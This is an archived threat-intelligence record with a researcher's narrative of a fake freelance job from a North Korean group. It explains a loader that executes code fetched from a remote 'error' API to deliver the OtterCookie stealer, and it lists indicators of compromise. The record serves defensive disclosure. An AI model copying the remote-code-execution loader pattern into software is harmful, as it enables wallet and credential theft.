{ "id": "a98ff0cc-3901-4e18-951d-f963f79c8590", "created_at": "2026-04-06T00:22:33.392559Z", "updated_at": "2026-04-10T03:38:20.221542Z", "deleted_at": null, "sha1_hash": "d8d94230a79e6b5651ee9c536acfccb85d6e4f46", "title": "Interview with the Chollima", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 11102947, "plain_text": "Interview with the Chollima\r\nBy Mauro Eldritch\r\nPublished: 2025-11-07 · Archived: 2026-04-05 18:30:04 UTC\r\nAnother year, another Chollima added to our trophy wall.\r\nFebruary came and went once again, this time without a peep from our dear friends behind the Great Firewall,\r\nnor from those under the menacing guise of the Great Leader. Not that I missed them, but something felt… off.\r\nHad they forgotten about us? Are we no longer that important of a target? Did they simply decide to move on and\r\nforgive us every time we mocked them publicly—when their ACME-branded malware blew up in their faces,\r\ngiving us the chance to weaponize it into talks and articles at the best conferences and magazines in the world?\r\nNo, I don’t think they’re the type to turn the other cheek. They waited until April to fine-tune the stockade after\r\nplanning something highly targeted. At us.\r\nWell, at me.\r\nIt all started in the most vicious hunting ground for Threat Actors, when a muppet well-respected Lazarus agent\r\napproached me carelessly under the name \"Wilton Santos\", asking if I was open to working on a fix for its DApp.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 1 of 13\n\nI asked for further clarification, and the sad story rolled in: they were a team of seven developers, but all of them\r\nwere on vacation (bad human resources planning there), and needed a trivial but urgent fix on its UI.\r\nThe DApp was “Gamba v2”, a gaming platform where users could join by connecting with their wallets (you\r\nmight think this is the strike point, but that would be too obvious). The UI problem was that they wanted to\r\ndynamically display the user’s wallet in a specific profile button. This is pretty trivial, and many JS libraries can\r\ndo it in two or three lines of code.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 2 of 13\n\nAfter successfully patching the issue, I just needed to send a video of the fix working, and I would be paid the\r\nastronomical amount of 500 USDT for a 3-line patch.\r\n\u003csarcasm\u003e\r\nI can’t believe there are BSD kernel developers out there submitting patches for free…\r\n\u003c/sarcasm\u003e\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 3 of 13\n\nI accepted, because I can smell a good old-fashioned APT campaign miles away.\r\nAnd then, our friend “Wilton” shared a BitBucket repository.\r\nSee the background panel. Creation date: yesterday.\r\nTime to get the work done, I guess.\r\nThere’s an important context to add here. The Chollimas (North Korean state-sponsored actors) are running a\r\ncampaign targeting engineers and executives in the fintech and crypto sectors.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 4 of 13\n\nThey attempt to trick engineers with fake job interviews or postings, coaxing them into running infected coding\r\nchallenges.\r\nThey also target executives by luring them into Zoom calls with fake VCs or business partners. Once in, the\r\nattackers feign not hearing the victim speaking and act angry about it. Then, one of them shares a fake Zoom\r\nfix or update to solve the issue. Over the fear of the deal going sour, the victim usually runs it and gets infected.\r\nThis effort is being tracked as DevPopper or ContagiousInterview.\r\nBut this time, it’s different. As noted in the closure of the last section, this repository was created just a day ago,\r\nwith no public mentions of it, the person who shared it with me, or the endpoints and infrastructure it attempts to\r\nreach.\r\nEverything is brand new.\r\nBut there’s still something more sinister about it: the code is completely clean. There’s no malicious payload,\r\nfake packages, infected libraries, or dependencies.\r\nIn Gibson’s words: It’s clear as ethanol.\r\nDifferent Lazarus divisions have different approaches.\r\nBut then, after carefully reviewing the code, I found their entry point, and I must say, it is the most creative one\r\nI’ve seen in a long time. While the code itself isn’t malicious, there’s a specific bootstrap function that will\r\nalways fail. However, it’s contained within a Try/Catch block—a special construct where the language will Try\r\nto do something and Catch the workflow if something goes wrong, preventing it from crashing, and doing\r\nsomething to remediate the error.\r\nThat Catch block, in this case, will invoke a function called errorHandler, which will receive an error code\r\ndirectly from an external API… and execute it.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 5 of 13\n\nYou read it right: the error code comes from a distant server in Finland (not a Gibson reference), and it is then\r\nexecuted via a require statement.\r\nThis is our implant!\r\nNow, we could just burn it in an intelligence pulse… or better yet, use what we know to strike back.\r\nThe server has two open ports: port 80, running the API on Node.js Express, and port 7777, identified as running\r\nRDP (Remote Desktop Protocol for Windows).\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 6 of 13\n\nReaching out to the API and triggering a fabricated error reveals an interesting internal output, where we can see\r\nthat our friends are indeed using Windows… with the Administrator user.\r\nRunning internet-facing services as a privileged user—worse yet, as Administrator—is a bad idea and Wilton\r\nwill find out about it pretty soon.\r\nThe other service running on port 7777 is Remote Desktop Protocol, which allows us to authenticate—if only we\r\nhad the necessary credentials.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 7 of 13\n\nBut that’s a story for another day. They don’t know we know, so let’s use that to our tactical advantage.\r\nUsing ANY.RUN’s sandbox, we spin up a disposable Ubuntu machine, install NodeJs, and run the code as if we\r\nwere an unsuspecting victim trying to make a quick 500 USDT (remember we’re here for that reason after all?).\r\nRunning the code, of course, triggers the mandatory failure, which bumps into the Try/Catch block, which\r\nreceives the error from the Finnish API.\r\nBut what does that error say? It’s an obfuscated JavaScript snippet.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 8 of 13\n\nThis would be executed directly on our local machine while we’re distracted trying to submit a patch for a visual\r\nbug. Lazarus loves obfuscating JavaScript code with a popular online tool, but since they don’t know we\r\nknow, we’ll use it against them.\r\nAt first glance, it looks like BeaverTail—one of Lazarus’ latest cyberweapons, commonly paired with\r\nInvisibleFerret—but on closer inspection, it turns out to be another animal we still didn’t have in our personal\r\ncollection: OtterCookie.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 9 of 13\n\nThis not-so-playful otter works as a Stealer-type malware, targeting browser password managers and\r\nextensions (specifically crypto wallets), and is also deployed in the ContagiousInterview campaign.\r\nWe tried catching the Otter, and we did. We have the infrastructure, the sample, the involved accounts, and their\r\ncommunication script.\r\nIt was time to contact our ‘employer’ to update them on the progress of the job.\r\nI went back to LinkedIn and told my employer that I had two ways of implementing the patch and would like to\r\nhave a short meeting to discuss them. He bought it and wanted me to run the sample during the call to see the\r\nresults.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 10 of 13\n\nAnd so, I started recording my screen, waiting in silence for the wild Chollima to set foot in the trap—and it did,\r\nwith an anime profile picture and under the name of “0xdori DFO”.\r\nI expected to see a majestic winged horse stomping bravely over the scene, but instead, I ended up with a scared\r\nlittle pony fleeing.\r\nBut, I’ll let you judge that for yourself…\r\nThe following video has been edited (and the Threat Actor muted) to avoid disclosing certain indicators.\r\nWe may upload a full version in the future.\r\nThe pony pranced away in panic, without saying another word.\r\nBeing gentlemen, I thought we could at least exchange a proper farewell, but I was promptly blocked.\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 11 of 13\n\nWe claimed the game and called it a day.\r\nBut, my friends, the hunting season never ends…\r\nIPv4:135.181.123.177\r\nDomain:chainlink-api-v3.cloud\r\nURL:http[:]//chainlink-api-v3[.]cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e\r\nURL:http[:]//chainlink-api-v3[.]cloud/api/\r\nURL:https[:]//bitbucket.org/0xhpenvynb/mvp_gamba/downloads/\r\nSHA256:aa0d64c39680027d56a32ffd4ceb7870b05bdd497a3a7c902f23639cb3b43ba1\r\nSHA256:071aff6941dc388516d8ca0215b757f9bee7584dea6c27c4c6993da192df1ab9\r\nSHA256:486f305bdd09a3ef6636e92c6a9e01689b8fa977ed7ffb898453c43d47b5386d\r\nSHA256:ec234419fc512baded05f7b29fefbf12f898a505f62c43d3481aed90fef33687\r\nFileName:0xhpenvynb-mvp_gamba-6b10f2e9dd85.zip\r\nSOLWallet:V2grJiwjs25iJYqumbHyKo5MTK7SFqZSdmoRaj8QWb9\r\nOriginal Intelligence Pulse on LevelBlue OTX\r\nOtterCookie source code (obfuscated)\r\nOtterCookie source code (deobfuscated)\r\nFake project (loader) source code\r\nThis work would not be possible without the contribution from dedicated Lazarus Agents who surrendered their\r\ncyber-weapons to the Quetzal Team. We honor them here:\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 12 of 13\n\n❌ Edward from Labyrinth Chollima. Fell during the QRLog campaign, in which we discovered the QRLog\r\nmalware.\r\n❌ Nargis from Velvet Chollima. Fell during the DreamJob campaign, in which we captured the Docks\r\nmalware.\r\n❌ Artyom from Velvet Chollima. Fell during the ContagiousInterview campaign, in which -alongside another\r\nteam- we discovered the ChaoticCapybara malware.\r\n❌ Wilton from Famous Chollima. Fell during the ContagiousInterview campaign, in which we captured the\r\nOtterCookie malware.\r\nComment [F] to pay respects and don’t cry for them: they fell bravely against the best.\r\nSource: https://quetzal.bitso.com/p/interview-with-the-chollima\r\nhttps://quetzal.bitso.com/p/interview-with-the-chollima\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://quetzal.bitso.com/p/interview-with-the-chollima" ], "report_names": [ "interview-with-the-chollima" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "7187a642-699d-44b2-9c69-498c80bce81f", "created_at": "2025-08-07T02:03:25.105688Z", "updated_at": "2026-04-10T02:00:03.78394Z", "deleted_at": null, "main_name": "NICKEL TAPESTRY", "aliases": [ "CL-STA-0237 ", "CL-STA-0241 ", "DPRK IT Workers", "Famous Chollima ", "Jasper Sleet Microsoft", "Purpledelta Recorded Future", "Storm-0287 ", "UNC5267 ", "Wagemole " ], "source_name": "Secureworks:NICKEL TAPESTRY", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d05e8567-9517-4bd8-a952-5e8d66f68923", "created_at": "2024-11-13T13:15:31.114471Z", "updated_at": "2026-04-10T02:00:03.761535Z", "deleted_at": null, "main_name": "WageMole", "aliases": [ "Void Dokkaebi", "WaterPlum", "PurpleBravo", "Famous Chollima", "UNC5267", "Wagemole", "Nickel Tapestry", "Storm-1877" ], "source_name": "MISPGALAXY:WageMole", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434953, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d8d94230a79e6b5651ee9c536acfccb85d6e4f46.pdf", "text": "https://archive.orkl.eu/d8d94230a79e6b5651ee9c536acfccb85d6e4f46.txt", "img": "https://archive.orkl.eu/d8d94230a79e6b5651ee9c536acfccb85d6e4f46.jpg" } }